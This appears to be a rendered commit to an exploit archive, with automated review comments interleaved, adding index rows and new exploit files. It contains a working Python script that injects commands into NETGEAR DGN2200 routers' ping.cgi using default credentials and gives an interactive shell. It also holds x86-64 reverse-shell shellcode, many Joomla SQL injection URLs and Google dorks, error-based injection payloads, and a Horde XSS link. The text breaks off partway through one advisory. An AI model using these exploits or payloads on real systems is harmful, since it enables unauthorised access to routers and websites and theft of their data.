DB: 2017-02-20
14 new exploits

Linux - Reverse Shell Shellcode (66 bytes)
Joomla! Component com_Joomlaoc - 'id' SQL Injection
Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection
Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection
Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection
Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload
Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload
Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting
Horde 3.3.5 - Cross-Site Scripting
Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection
Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection
Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection
Joomla! Component OS Property 3.0.8 - SQL Injection
Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection
Joomla! Component OS Services Booking 2.5.1 - SQL Injection
Joomla! Component Room Management 1.0 - SQL Injection
Joomla! Component Bazaar Platform 3.0 - SQL Injection
Joomla! Component Google Map Store Locator 4.4 - SQL Injection
Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection
NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution
Sawmill Enterprise 8.7.9 - Authentication Bypass
PHPShell 2.4 - Session Fixation
parent 2d72a9c8b9
commit ae0dd9fa7c
16 changed files with 614 additions and 5 deletions
22
files.csv
|
@ -15898,6 +15898,7 @@ id,file,description,date,author,platform,type,port
|
|||
41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
|
||||
41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
|
||||
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
|
||||
41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
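Review bot: the new 41398 row records platform `linux` and a description that names no architecture, but the file it points to (41398.nasm, added in this same commit) uses 64-bit registers (rax, rdi, rsi, rbx) and the `syscall` instruction with numbers 41/42/33/59, so it only assembles and runs as x86-64. The neighbouring 41282 row uses the `lin_x86` platform and a `Linux/x86 - ...` description, so this row should use the repository's `lin_x86-64` platform and say `Linux/x86-64 - Reverse Shell Shellcode (66 bytes)`; otherwise consumers filtering by architecture will miss it or try to run it as 32-bit.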
@ -21643,7 +21644,7 @@ id,file,description,date,author,platform,type,port
|
|||
9601,platforms/php/webapps/9601.php,"Joomla! Component BF Survey Pro Free - SQL Injection",2009-09-09,jdc,php,webapps,0
|
||||
9602,platforms/php/webapps/9602.pl,"Joomla! Component TPDugg 1.1 - Blind SQL Injection",2009-09-09,NoGe,php,webapps,0
|
||||
9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0
|
||||
9604,platforms/php/webapps/9604.txt,"Joomla! Component com_Joomlaoc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0
|
||||
9604,platforms/php/webapps/9604.txt,"Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0
|
||||
9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0
|
||||
9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0
|
||||
9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - 'menu.php' Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0
|
||||
|
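Review bot: the 9604 row appears twice in this render because the old and new descriptions are shown without +/- markers; the hunk header (-7/+7) confirms it is a one-line rewrite rather than a duplicated id, which matters because consumers of files.csv assume one row per id. The rewrite adds a version string `1.0` that the old row lacked and that nothing in this commit evidences (9604.txt is not touched here); cite where the version comes from, and note that the new name `Joomloc` matches the `Joomloc-CAT`/`Joomloc-Lite` rows added at 41383/41384, all of which share the `com_joomloc` option name, so a search on the option name now only hits those two and no longer hits 9604.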
@ -22939,7 +22940,7 @@ id,file,description,date,author,platform,type,port
|
|||
12108,platforms/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0
|
||||
12111,platforms/php/webapps/12111.txt,"Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12113,platforms/php/webapps/12113.txt,"Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12113,platforms/php/webapps/12113.txt,"Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0
|
||||
12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
|
||||
12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
|
||||
|
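Review bot: renaming 12113 from `com_awdwall` to `AWDwall` drops the Joomla option name from the description, and this commit also adds 41385 `JomWALL 4.0 - 'wuid' Parameter SQL Injection`, whose advisory targets `option=com_awdwall` as well. The same component is now listed under two product names with no common searchable token; either keep `com_awdwall` in one of the descriptions or state in the 41385 advisory that JomWALL is the renamed AWDwall, so that someone triaging a site by option name finds both entries.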
@ -25626,7 +25627,7 @@ id,file,description,date,author,platform,type,port
|
|||
19792,platforms/php/webapps/19792.txt,"Joomla! Component 'com_ksadvertiser' - Remote File / Bypass Upload",2012-07-13,D4NB4R,php,webapps,0
|
||||
19825,platforms/php/webapps/19825.php,"Shopware 3.5 - SQL Injection",2012-07-14,Kataklysmos,php,webapps,0
|
||||
19964,platforms/php/webapps/19964.txt,"PHP-Nuke module (SPChat) - SQL Injection",2012-07-20,"Yakir Wizman",php,webapps,0
|
||||
19829,platforms/php/webapps/19829.txt,"Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0
|
||||
19829,platforms/php/webapps/19829.txt,"Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0
|
||||
19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras - Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0
|
||||
19862,platforms/php/webapps/19862.pl,"WordPress Theme Diary/Notebook Site5 - Email Spoofing",2012-07-16,bwall,php,webapps,0
|
||||
19863,platforms/php/webapps/19863.txt,"CakePHP 2.x < 2.2.0-RC2 - XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0
|
||||
|
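Review bot: the 19829 rewrite only removes the quotes around `com_osproperty`, yet the 41386 row added in this commit for the same component uses the product name `OS Property 3.0.8`; pick one convention (product name with the option name in the advisory, or option name everywhere) so the two OS Property entries sort and search together. Unrelated to this change but visible in the context lines: 19964 sits between 19825 and 19829, so the id order in this region is already broken and a sort pass would be worthwhile.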
@ -27494,7 +27495,7 @@ id,file,description,date,author,platform,type,port
|
|||
25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0
|
||||
25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0
|
||||
25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure",2013-05-08,HTP,multiple,webapps,0
|
||||
33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
|
||||
33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
|
||||
33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 - Administration Interface admin/cmdshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
|
||||
33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - Administration Interface admin/sqlshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
|
||||
25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 - showgallery.php Multiple Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0
|
||||
|
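Review bot: shortening 33406 to `Horde 3.3.5 - Cross-Site Scripting` makes it indistinguishable in the listing from 33407 and 33408, which are the same author, date and product and keep their long `admin/cmdshell.php` and `admin/sqlshell.php PATH_INFO` titles; the three entries differ only by the affected script, which is exactly the detail the new title removes. Either keep `admin/phpshell.php PATH_INFO` in this title or shorten all three consistently (for example by script name), and note that the rendered hunk for the advisory file itself (the `@ -8,4 +8,4 @@` block later in this commit) shows no visible change, so check that the two edits were intended to go together.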
@ -37300,3 +37301,16 @@ id,file,description,date,author,platform,type,port
|
|||
41379,platforms/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
|
||||
41380,platforms/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
|
||||
41382,platforms/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
|
||||
41383,platforms/php/webapps/41383.txt,"Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41384,platforms/php/webapps/41384.txt,"Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41385,platforms/php/webapps/41385.txt,"Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41386,platforms/php/webapps/41386.txt,"Joomla! Component OS Property 3.0.8 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41387,platforms/php/webapps/41387.txt,"Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41388,platforms/php/webapps/41388.txt,"Joomla! Component OS Services Booking 2.5.1 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41389,platforms/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41390,platforms/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41391,platforms/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41393,platforms/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41394,platforms/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps,0
|
||||
41395,platforms/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps,0
|
||||
41396,platforms/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps,0
|
||||
|
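Review bot: the 13 added rows are inconsistent about naming the injected parameter: 41383, 41384, 41385 and 41387 name it ('ville', 'site_id', 'wuid', 'id'), while 41386, 41388, 41389, 41390, 41391 and 41393 do not even where the advisory shows a single sink (41386 is `catIds[0]`, 41391 is `filter_time`); name it where there is one and leave it off only for the multi-parameter advisories. Two descriptions understate the preconditions: 41394 is an authenticated command injection (the script posts with HTTP basic auth `admin`/`password`), so `Authenticated` belongs in the title, and 41395 is filed under `windows` although the advisory says Sawmill runs on every major platform and the bypass is in the web login, not the OS; `windows` is defensible only because the tested build is the Windows installer, so say so in the advisory or use `multiple`.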
|
|
58
platforms/hardware/webapps/41394.py
Executable file
|
@ -0,0 +1,58 @@
|
|||
#!/usr/bin/python
|
||||
#Provides access to default user account, privileges can be easily elevated by using either:
|
||||
# - a kernel exploit (ex. memodipper was tested and it worked)
|
||||
# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
|
||||
# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon along with the 2nd vuln)
|
||||
|
||||
#Pozdrawiam: Kornela, Komara i Sknerusa
|
||||
|
||||
import sys
|
||||
import requests
|
||||
|
||||
#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
|
||||
#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to
|
||||
|
||||
login = 'admin'
|
||||
password = 'password'
|
||||
|
||||
|
||||
def main():
|
||||
if len(sys.argv) < 2 or len(sys.argv) == 3:
|
||||
print "./netgearpwn.py <router ip>"
|
||||
return
|
||||
spawnShell()
|
||||
|
||||
def execute(cmd):
|
||||
r = requests.post("http://" + sys.argv[1] + "/ping.cgi", data={'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping':"Ping", 'ping_IPAddr':"12.12.12.12; " + cmd}, auth=(login, password), headers={'referer': "http://192.168.0.1/DIAG_diag.htm"})
|
||||
result = parseOutput(r.text)
|
||||
return result
|
||||
|
||||
def spawnShell():
|
||||
r = execute("echo pwn3d")
|
||||
|
||||
if any("pwn3d" in s for s in r) == False:
|
||||
print "Something went wrong, is the system vulnerable? Are the credentials correct?"
|
||||
return
|
||||
|
||||
while True:
|
||||
cmd = raw_input("$ ")
|
||||
r = execute(cmd)
|
||||
for l in r:
|
||||
print l.encode("utf-8")
|
||||
|
||||
def parseOutput(output):
|
||||
yet = False
|
||||
a = False
|
||||
result = []
|
||||
for line in output.splitlines():
|
||||
if line.startswith("<textarea"):
|
||||
yet = True
|
||||
continue
|
||||
if yet == True:
|
||||
if line.startswith("</textarea>"):
|
||||
break
|
||||
result.append(line)
|
||||
return result
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
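Review bot: the argument check `if len(sys.argv) < 2 or len(sys.argv) == 3:` in `main` rejects exactly three arguments but accepts four or more, which is not what the usage line implies; `if len(sys.argv) != 2:` states the intent. `execute` catches no `requests` exception, so a wrong address or closed port produces a traceback instead of the "Something went wrong" message that `spawnShell` prints for the echo check, and `any(...) == False` should be `not any(...)`. The file uses Python 2 `print` statements and `raw_input` under a generic `#!/usr/bin/python` shebang, so it will not run on systems where that resolves to Python 3; either pin `python2` in the shebang or port it. Worth recording for defenders: the request shape is fixed (POST to `/ping.cgi` with a `ping_IPAddr` value containing `;` and a hardcoded `Referer: http://192.168.0.1/DIAG_diag.htm` regardless of the target address), which makes this script easy to fingerprint in the device's HTTP logs. The header comments also assert a suid `/bin/bd` binary and hardcoded `Gearguy`/`Guest` credentials on "SOME" firmware versions without naming them; an advisory should list the versions checked.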
71
platforms/linux/shellcode/41398.nasm
Executable file
|
@ -0,0 +1,71 @@
|
|||
;The MIT License (MIT)
|
||||
|
||||
;Copyright (c) 2017 Robert L. Taylor
|
||||
|
||||
;Permission is hereby granted, free of charge, to any person obtaining a
|
||||
;copy of this software and associated documentation files (the “Software”),
|
||||
;to deal in the Software without restriction, including without limitation
|
||||
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
|
||||
;and/or sell copies of the Software, and to permit persons to whom the
|
||||
;Software is furnished to do so, subject to the following conditions:
|
||||
|
||||
;The above copyright notice and this permission notice shall be included
|
||||
;in all copies or substantial portions of the Software.
|
||||
|
||||
;The Software is provided “as is”, without warranty of any kind, express or
|
||||
;implied, including but not limited to the warranties of merchantability,
|
||||
;fitness for a particular purpose and noninfringement. In no event shall the
|
||||
;authors or copyright holders be liable for any claim, damages or other
|
||||
;liability, whether in an action of contract, tort or otherwise, arising
|
||||
;from, out of or in connection with the software or the use or other
|
||||
;dealings in the Software.
|
||||
;
|
||||
; For a detailed explanation of this shellcode see my blog post:
|
||||
; http://a41l4.blogspot.ca/2017/02/assignment-2b.html
|
||||
|
||||
global _start
|
||||
section .text
|
||||
_start:
|
||||
; Socket
|
||||
push 41
|
||||
pop rax
|
||||
push 2
|
||||
pop rdi
|
||||
push 1
|
||||
pop rsi
|
||||
cdq
|
||||
syscall
|
||||
; Connect
|
||||
xchg edi, eax
|
||||
push rdx
|
||||
mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002
|
||||
not rbx
|
||||
push rbx
|
||||
mov al, 42
|
||||
push rsp
|
||||
pop rsi
|
||||
mov dl, 16
|
||||
syscall
|
||||
; Dup 2
|
||||
push 3
|
||||
pop rsi
|
||||
dup2loop:
|
||||
mov al, 33
|
||||
dec esi
|
||||
syscall
|
||||
loopnz dup2loop
|
||||
; Execve
|
||||
; rax and rsi are zero from the result of the last dup2 syscall and loop
|
||||
push rax ; zero terminator for the following string that we are pushing
|
||||
|
||||
mov rbx, '/bin//sh'
|
||||
push rbx
|
||||
|
||||
; store /bin//sh address in RDI
|
||||
push rsp
|
||||
pop rdi
|
||||
|
||||
cdq ; zero rdx
|
||||
|
||||
mov al, 59
|
||||
syscall
|
|
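Review bot: the `loopnz dup2loop` in the Dup 2 section relies on two unstated facts that deserve a comment, because a reader who counts registers will conclude rcx is uninitialised and the loop cannot terminate: on x86-64 Linux the `syscall` instruction leaves rcx holding the return RIP (non-zero) and RFLAGS is restored from r11 on return, so the ZF set when `dec esi` reaches zero survives the `dup2` call and is what ends the loop after dup2(sock, 0). The Execve comment ("rax and rsi are zero from the result of the last dup2 syscall and loop") depends on the same behaviour, since rax is dup2's return value 0 on that final iteration. The `not`-encoded sockaddr constant is only explained as `0x0100007f5c110002`; spell out the layout in the comment (sin_family 0x0002 = AF_INET, sin_port 0x115c = 4444 in network order, sin_addr 0x0100007f = 127.0.0.1, with the preceding `push rdx` supplying the eight zero bytes of sin_zero) so the 16-byte `mov dl, 16` length and the loopback target are verifiable without decoding by hand. Minor: the MIT header uses curly quotes (“Software”, “as is”), which is the only non-ASCII in the file and trips tools that read it as ASCII.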
@ -8,4 +8,4 @@ This issue affects versions prior to Horde 3.3.6.
|
|||
|
||||
Note that additional products that use the Horde framework may also be vulnerable.
|
||||
|
||||
http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
|
||||
http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
|
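Review bot: the removed and added lines of this hunk render identically (`http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>`), so the change is whitespace, line-ending or invisible-character only; confirm that is intended, because a stray trailing space is not worth a diff while a CRLF normalisation should be noted. The file header for this hunk is also missing from the render, so which advisory it belongs to (the 33406 rename in files.csv suggests the Horde phpshell.php advisory) is not stated anywhere on the page.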
17
platforms/php/webapps/41383.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Joomloc-CAT v4.1.3 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_joomloc
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://www.joomloc.fr.nf/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-cat/
|
||||
# Demo: http://www.joomloc.fr.nf/joomlocprocmpms/
|
||||
# Version: 4.1.3
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=[SQL]
|
||||
# # # # #
|
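Review bot: the advisory gives only a URL template with `ville=[SQL]` and no evidence that the parameter reaches a query: no vulnerable file or line in the component, no response excerpt, and no payload, whereas the 41389, 41390 and 41391 advisories in this same commit at least include an error-based marker payload. Add the sink (the controller or model that builds the query from `ville`) or the observed error, and replace `Tested on: Win7 x64, Kali Linux x64` with the Joomla, PHP and MySQL versions, which are what determine whether a SQL injection in a component is reachable. The `Exploit Title` line should also carry the parameter name so it matches the files.csv description.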
18
platforms/php/webapps/41384.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Joomloc-Lite v1.3.2 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_joomloc
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://www.joomloc.fr.nf/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-lite/
|
||||
# Demo: http://www.joomloc.fr.nf/joomloclite/
|
||||
# Version: 1.3.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_joomloc&view=loc&layout=singleloc&site_id=[SQL]
|
||||
# # # # #
|
||||
|
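Review bot: the `Google Dork` line is identical to the one in 41383 (`inurl:index.php?option=com_joomloc`), so it cannot distinguish Joomloc-Lite from Joomloc-CAT; the `view=loc&layout=singleloc` pair in the URL is the distinguishing token and belongs in the dork or in a sentence. The same evidence gap as 41383 applies (no sink, no payload, OS-only `Tested on`), and the file ends with a trailing blank line that the sibling advisories lack, which is why this hunk is 18 lines instead of 17.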
17
platforms/php/webapps/41385.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JomWALL v4.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_awdwall
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://dashbite.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/jomwall/
|
||||
# Demo: http://demo-dashbite.com/
|
||||
# Version: 4.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_awdwall&task=gethovercard&wuid=[SQL]
|
||||
# # # # #
|
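Review bot: the title says JomWALL 4.0 but the dork and the URL target `option=com_awdwall&task=gethovercard&wuid=`, and files.csv already carries 12113 (`AWDwall 1.5.4 - Local File Inclusion / SQL Injection`, renamed in this commit) for the same option name; state whether JomWALL is the renamed AWDwall and whether 4.0 is the first affected version, otherwise a site running an intermediate version cannot be triaged from either entry. As with the other Ihsan Sencan advisories here, no sink or response evidence is given for the `wuid` parameter.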
17
platforms/php/webapps/41386.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component OS Property v3.0.8 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_osproperty
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: https://www.joomdonation.com/
|
||||
# Software Buy: https://www.joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html
|
||||
# Demo: http://osproperty.ext4joomla.com/
|
||||
# Version: 3.0.8
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_osproperty&view=ltype&catIds[0]=[SQL]
|
||||
# # # # #
|
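Review bot: the sink is the array parameter `catIds[0]`, which the title and the files.csv description both omit; because PHP materialises `catIds[]` as an array, the advisory should say whether only the first element is used or whether every element of the array is concatenated into the query (a common pattern for an `IN (...)` clause built with `implode`), since that changes which request shapes a WAF rule or a log search needs to cover. No payload or error output is included to show the value actually reaches SQL.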
17
platforms/php/webapps/41387.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component EShop v2.5.1 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_eshop
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: https://www.joomdonation.com/
|
||||
# Software Buy: https://www.joomdonation.com/joomla-extensions/eshop-joomla-shopping-cart.html
|
||||
# Demo: http://joomdonationdemo.com/eshop
|
||||
# Version: 2.5.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_eshop&view=category&id=[SQL]
|
||||
# # # # #
|
21
platforms/php/webapps/41388.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component OS Services Booking v2.5.1 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_osservicesbooking
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: https://www.joomdonation.com/
|
||||
# Software Buy: https://www.joomdonation.com/joomla-extensions/joomla-services-appointment-booking.html
|
||||
# Demo: http://osb.ext4joomla.com/
|
||||
# Version: 2.5.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&task=default_showmap&vid=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=&vid=[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
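Review bot: the four URLs plus `Etc..` leave it unclear whether `vid`, `category_id` and `employee_id` are three independent sinks or one query reached through different views; the last two URLs pass `employee_id=` empty while the third marks it as the injection point, so the reader cannot tell which parameter is the subject of each line. List each injectable parameter once with the view or task it is reached through and its context (numeric or quoted), and drop `Etc..`, which asserts further sinks without naming them.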
23
platforms/php/webapps/41389.txt
Executable file
|
@ -0,0 +1,23 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Room Management v1.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_roommgmt
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://matamko.com/
|
||||
# Software Buy: http://matamko.com/products/room-management/live-demo
|
||||
# Demo: http://matamko.com/products/room-management/live-demo
|
||||
# Version: 1.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/room/book?tmpl=component&id=5&date=[SQL]
|
||||
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=[SQL]
|
||||
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=0&id=[SQL]
|
||||
